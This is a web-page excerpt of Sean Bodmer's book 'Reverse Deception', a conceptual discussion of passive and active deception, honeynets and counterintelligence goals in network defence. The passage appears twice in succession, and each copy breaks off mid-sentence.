Reverse Deception: Organized Cyber Threat Counter-Exploitation Read Online Free Page B
Author: Sean Bodmer
Tags: General, Computers, security
them, there’s a key question at the end: Is there a way to weave a new effort out of the remnants of the old? Even with a failure, is it possible that the adversary, now that he knows we might try this and that, could be less alert to, or less sensitive to, a variation?
Active vs. Passive Deception
Deception, like intelligence, may have both passive and active aspects. Purely passive deceptions may only cause an attacker to expose his methods for our study. Active deceptions may involve setting up an attacker for an exploitation of our own.
Passivity characterizes most network defenses in that the defender waits for the attacker. Passwords are an example. They merely prevent an attacker from gaining easy access to network content, but by that point, the attacker has already learned something. For the defender, passwords are easy to administer and control. Used well and conscientiously administered in concert with other defenses, passwords can be very effective.
But holding an attacker at bay will not be enough. With sufficient incentive and enough time and resources, a determined attacker may gain access somehow. In the end, passive measures leave the initiative in the attacker’s hands. He calculates how much of his time and resources your data is worth.
As a fondly remembered counterintelligence instructor once said, “The purpose of a lock is not to deter criminals. It is to keep honest people honest.”
A honeynet —a vulnerable net set out to entice attackers so that their methods may be studied—is passive but also active in the sense that it can be placed or designed to attract a certain kind of attacker. It is true that the honeynet itself induces behavior in an attacker, but, if deception were part of the plan at all, the exploitation may be indirect or deferred.
Counterintelligence seeks not only to frustrate hostile attempts to penetrate friendly secrets. At its highest level, counterintelligence seeks ultimately to control the hostile intelligence service. 7 Active deception seeks to attract specific attackers so that they may be studied and their networks identified, but exploitation of the attacker and his net is the main aim. It seeks to manipulate the behavior of the attacker, the better to cause him to behave in ways advantageous to the defense. The exploitation is the culminating purpose of counterintelligence. The fact that one intelligence service achieves control over another only rarely testifies to the difficulty of doing so, but the goal persists.
Intelligence may be gathered in the course of a deception operation and then studied and integrated into a deception, but those are incidental spin-off benefits. At minimum, the active deception seeks to disadvantage the hostile attacker by causing him to accept unwise risks, gather erroneous information, or behave in ways embarrassing or damaging to his sponsor. At maximum, active deception seeks to destroy the attacker, at least figuratively, by causing him to behave not merely ineffectively, but also to become a source of disruption or loss to others of his ilk.
Clearly, there is a continuum of risk associated with deception, as there is with any competitive endeavor. The actions taken to beat a competitor are bound to elicit responses from the competitor. And the responses will be commensurate with perceptions of risk or gain on both sides. Risk of failure or blowback is always part of the calculation of how and to what extent deception can be used as an element of network defense.
When to Deceive
The following is a simple diagram that attackers or defenders of networks may use to organize their thinking about deception. Clearly quite simple-minded, it is meant only to provoke. Also, it illustrates the need to think about attacking and attackers along a continuum—a fairly long one. This is also the case with deceptive defenses and defenders.
Deception originating in the lower-right corner of this diagram may be least dangerous to
Active vs. Passive Deception
Deception, like intelligence, may have both passive and active aspects. Purely passive deceptions may only cause an attacker to expose his methods for our study. Active deceptions may involve setting up an attacker for an exploitation of our own.
Passivity characterizes most network defenses in that the defender waits for the attacker. Passwords are an example. They merely prevent an attacker from gaining easy access to network content, but by that point, the attacker has already learned something. For the defender, passwords are easy to administer and control. Used well and conscientiously administered in concert with other defenses, passwords can be very effective.
But holding an attacker at bay will not be enough. With sufficient incentive and enough time and resources, a determined attacker may gain access somehow. In the end, passive measures leave the initiative in the attacker’s hands. He calculates how much of his time and resources your data is worth.
As a fondly remembered counterintelligence instructor once said, “The purpose of a lock is not to deter criminals. It is to keep honest people honest.”
A honeynet —a vulnerable net set out to entice attackers so that their methods may be studied—is passive but also active in the sense that it can be placed or designed to attract a certain kind of attacker. It is true that the honeynet itself induces behavior in an attacker, but, if deception were part of the plan at all, the exploitation may be indirect or deferred.
Counterintelligence seeks not only to frustrate hostile attempts to penetrate friendly secrets. At its highest level, counterintelligence seeks ultimately to control the hostile intelligence service. 7 Active deception seeks to attract specific attackers so that they may be studied and their networks identified, but exploitation of the attacker and his net is the main aim. It seeks to manipulate the behavior of the attacker, the better to cause him to behave in ways advantageous to the defense. The exploitation is the culminating purpose of counterintelligence. The fact that one intelligence service achieves control over another only rarely testifies to the difficulty of doing so, but the goal persists.
Intelligence may be gathered in the course of a deception operation and then studied and integrated into a deception, but those are incidental spin-off benefits. At minimum, the active deception seeks to disadvantage the hostile attacker by causing him to accept unwise risks, gather erroneous information, or behave in ways embarrassing or damaging to his sponsor. At maximum, active deception seeks to destroy the attacker, at least figuratively, by causing him to behave not merely ineffectively, but also to become a source of disruption or loss to others of his ilk.
Clearly, there is a continuum of risk associated with deception, as there is with any competitive endeavor. The actions taken to beat a competitor are bound to elicit responses from the competitor. And the responses will be commensurate with perceptions of risk or gain on both sides. Risk of failure or blowback is always part of the calculation of how and to what extent deception can be used as an element of network defense.
When to Deceive
The following is a simple diagram that attackers or defenders of networks may use to organize their thinking about deception. Clearly quite simple-minded, it is meant only to provoke. Also, it illustrates the need to think about attacking and attackers along a continuum—a fairly long one. This is also the case with deceptive defenses and defenders.
Deception originating in the lower-right corner of this diagram may be least dangerous to
Readers choose
Jan Siegel
Vincent Trigili
Natalie Hancock
Melissa Mayhue
Terry Pratchett
Susan Joseph
Ariel Glucklich
Robert Shea, Robert Anton Wilson
Jessica Mastorakos